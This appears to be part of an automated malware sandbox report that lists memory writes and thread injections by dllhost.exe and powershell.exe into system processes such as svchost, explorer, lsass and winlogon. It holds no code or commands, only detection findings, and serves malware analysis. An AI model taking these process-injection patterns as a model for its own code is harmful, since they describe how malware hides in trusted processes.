Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AEFC900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE14340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 9310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1AFE4460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 27C93250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 24463CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 227C0130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23A44F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F530850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13376160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 11B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 21F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 15E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1C115C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1BB497C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3DBE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 220A9EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 12198470000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 4056 base: 8B30000 value: 4D
Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 4056 base: 9310000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3588	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 6140	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 1520
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 2044

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140004000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140006000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140007000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 46FD240010	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F20A0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26384180000	Jump to behavior
